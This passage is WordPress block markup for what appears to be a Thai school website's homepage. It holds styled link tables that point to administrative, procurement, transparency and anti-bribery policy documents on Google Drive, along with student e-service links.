{\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%